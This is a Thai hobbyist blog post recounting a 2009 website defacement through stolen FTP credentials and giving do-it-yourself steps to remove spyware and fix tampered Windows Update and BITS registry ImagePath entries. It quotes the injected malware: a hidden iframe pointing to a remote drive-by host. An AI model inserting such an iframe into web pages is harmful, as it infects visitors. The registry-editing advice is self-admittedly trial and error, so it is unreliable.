Thai3Dviz  

Go Back   Thai3Dviz > Blogs > Nut

Blog นี้จะเขียนเรื่องทั่วๆไป สาระน่ารู้ เรื่องไร้สาระต่างๆ รวมไปถึง update ทุกเรื่องใน Thai3dviz.com
Rate this Entry

แก้ปัญหา Spyware แบบบ้านๆ Rootkit Spy Agent

Posted 08-07-2009 at 12:14 PM by Nut
Updated 10-07-2009 at 02:45 PM by Nut
Tags spyware

มีประสบการณ์มาเล่าให้อ่าน คิดว่ามีประโยชน์ครับ

ปัญหาที่ประสบ
1.windows load ช้า
2.web บริษัทโดนแฮก

ผมมักเคยชินว่า พอเครื่องใช้ไปนานๆ windows มักจะโหลดช้า ด้วยความไม่รู้ก็นึกว่าเป็นเรื่องปกติ เลยไม่ได้สนใจอะไรมาก แต่เมื่อ อาทิตย์ที่แล้ว เว็บ www.thai3dviz.co.th โดนแฮกหน้า forum index ทั้งๆที่ใช้ vbulletin ของแท้ โดยผมเขาไปเช็คไฟล์ index.php โดนใส่โค้ดเพิ่มดังนี้

Code:
// ### ALL DONE! SPIT OUT THE HTML AND LET'S GET OUTTA HERE... ###


/*======================================================================*\
|| ####################################################################
|| # Downloaded: 11:41, Tue Mar 31st 2009
|| # CVS: $RCSfile$ - $Revision: 28997 $
|| ####################################################################
\*======================================================================*/
?>



<iframe src="http://globalnameshop.cn:8080/index.php" width=126 height=103 style="visibility: hidden"></iframe>
ซึ่งถ้าวันนั้นใครบังเอิญคลิกไปที่หน้า furum index ของ thai3dviz.co.th จะพบกับหน้าขาวๆว่างเปล่า อาจติด spyware โดยไม่รู้ตัวไปด้วย (คิดว่าคงไม่มี เพราะเว็บนั้นคนเข้าน้อย)

ด้วยความเป็นห่วง thai3dviz.com จะโดนไปด้วยจึงกุลีกุจอแก้ปัญหาแบบหามรุ่งหามค่ำ (เว่อร์มะ)

หลังจากขอความช่วยเหลือจาก support ของ host thnic ที่เอาเว็บไปฝากไว้ และไปโพสขอความช่วยเหลือจาก webboard ของ vbulletin
ได้ข้อสรุปว่าเครื่องคอมพิวเตอร์ติดเชื้อ spyware / malware
เพราะช่างเทคนิคของ thnic ได้ตรวจสอบแล้วพบว่า hacker/bot มีการเข้าไปแก้ไขไฟล์ผ่านทาง ftp ซึ่งแสดงว่าเขาได้ทั้ง username และ password ไปจากเครื่องของเรา
ที่น่าสงสัยที่สุดคือโปรแกรม ftp ที่ผมใช้ cuteftp(เถื่อน) อาจมีการฝัง spyware เอาไว้
ช่างจึงแนะนำให้เปลี่ยนไปใช้ filezilla ซึ่งเป็นของฟรีแทน และให้ทำการ scan เครื่องขนานใหญ่ทั้งที่บ้านและที่ทำงานด้วย nod32 ซึ่งปรากฎว่าฆ่าไปได้ 1 ตัวเป็น trojan อะไรสักอย่างจำชื่อไม่ได้


ทีนี้เมื่อได้ทำการแก้ไขเป็นที่เรียบร้อย ปรากฎว่าหลังจากนั้น 1 อาทิตย์ windows ที่ office เกิดปัญหาขึ้นไดอาล็อคมาว่า service error และทำการนับถอยหลังเพื่อรีสตาร์ทเครื่องเอง ผมจึงแก้ปัญหาโดยการใช้ system restore แล้วจึงค่อยๆไล่เช็คปัญหา
ผ่านไป 1 วันเต็มๆพบว่า windows ไม่สามารถ เปิด auto update และเข้าไปใช้หน้า update ของ microsoft ได้ ขึ้น error เป็นโค้ด 0x80070420

หาข้อมูลจาก code ดังกล่าวทดลองทำอยู่หลายวิธีในที่สุดก็พบปัญหาว่ามัน อยู่ที่ imagepath
%fystemroot%\system32\svchost.exe -k netsvcs.

โปรดสังเกต %fystemroot% ที่ถูกต้องควรเป็น %Systemroot%

ตัวนี้แหละที่เมื่อแก้ปัญหาแล้ว เครื่องคอมฯทำงานลื่นขึ้นเป็นปลาไหล จึงคิดว่าน่าจะเอามาฝากสมาชิกไทยวิซ เผื่อใครประสบปัญหาเครื่องอืดแบบเดียวกัน


ตรวจเช็คเครื่อง

1. คลิก start > run พิมพ์ regedit.exe

2.ไปที่ HKEY_Local_Machine\System\CurrentControlSet\Servic e\wuauserv
ตรวจดู ImagePath ถ้าขึ้นเป็น %fystemroot%\system32\svchost.exe -k netsvcs. ละก็เตรียมแก้ไขกันได้เลย

3.อีกจุดหนึ่งคือ HKEY_Local_Machine\System\CurrentControlSet\Servic e\BITS
ImagePath ก็จะถูกแก้ไปเช่นกัน


สืบเสาะ ลองผิดลองถูก

เนื่องจากไม่ใช่เทพคอมฯ จึงใช้วิธีลองผิดลองถูกมาหลายแบบจากการ search ด้วย google

อย่างแรก เขาให้คลิกขวาที่ wuauserv แล้วเลือก permission และแก้ permission ของ administrators ให้เป็น full control แล้วค่อยแก้ไข image path ให้ถูกต้อง
แต่ปรากฎว่า access denied บ้าง แก้แล้วก็เด้งกลับมาเหมือนเดิมอีกบ้าง
ฝรั่งบางคนบอกให้ทำเร็วๆบ้าง ก่อนที่เครื่องจะรู้ตัว มั่วจริงๆ

อันดับต่อมาบอกให้ไปโหลด code แล้ว save เป็นไฟล์ .bat /.cmd เอามา run เพื่อ reset admin permission ทำแล้วก็ไม่สำเร็จ คงเป็นเพราะโง่เรื่องพวกนี้ล่ะนะ

ข้อต่อมาก็ให้ load hijack โปรแกรม antispyware มาแก้ไข อันนี้น่าจะเข้าท่าที่สุดสำหรับคนไม่รู้เรื่อง ผมก็ลองลงไปสัก 4-5 ยี่ห้อปรากฎว่าก็ไม่สำเร็จ หาไม่เจอบ้าง หาเจอแต่ฆ่าไม่ได้ ต้องซื้อก่อนถึงฆ่าให้บ้าง

สุดท้ายเมื่อคืนนี้ไปเจอคำตอบเล็กๆ ในกระทู้เล็กๆของเว็บอะไรจำไม่ได้แห่งหนึ่ง
บอกว่า ให้ลองใช้ SuperAntiSpyware ดูสิปัญหาแบบเดียวกันแก้ได้หมด แถมเครื่องลื่นเชียว ก็เลยไปโหลดตัว trial มาลอง ปรากฎจริงอย่างที่โม้ไว้ แก้ได้จริงๆ

วิธีแก้

1. ลง SUPERAntiSpyware ที่โหลดมาฟรี แสกนเครื่อง แล้วฆ่า spyware ทิ้ง

2. จากนั้นให้ run > regedit.exe

3. ไปที่ HKEY_Local_Machine\System\CurrentControlSet\Servic e\BITS
คลิกขวาเลือก permission

4. ติ๊กถูกที่ช่อง full control

5. แก้ไข imagepath ให้เป็น %systemroot%\system32\svchost.exe -k netsvcs.

6.ทำซ้ำข้อ 3-5กับ HKEY_Local_Machine\System\CurrentControlSet\Servic e\wuauserv


7.แก้แบบเดียวกันกับ ControlSet002 ControlSet003 ControlSet004
ปลอดภัยไว้ก่อน

เสร็จแล้วลอง restart เครื่องดูจะพบว่า windows boot เร็วขึ้น




หมายเหตุ ทั้งหมดเป็นประสบการณ์ ไม่สามารถการันตี หรือ support ใดๆได้
เนื่องจากผมเองก็รู้เท่าที่รู้ มั่วมา แต่สรุปเอาไว้เป็นกระทู้เผื่อมีประโยชน์ต่อใครๆในอนา คต
Total Comments 1

Comments

  1. Old Comment
    bndc's Avatar
    blogs ดีอย่างนี้นี่เอง
    ที่ระบาย ได้ความรู้ เป็นเวทีแสดงความคิดเห็นส่วนตัว อย่างอิสระ แจ๋วที่สุด
    Posted 08-07-2009 at 01:31 PM by bndc bndc is offline
 

All times are GMT +7. The time now is 06:44 PM.

Design Developed by CompleteGFX
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.
Copyright ©2002-2010 Thai3dViz Co.,Ltd.
Hosting by THAISITE.net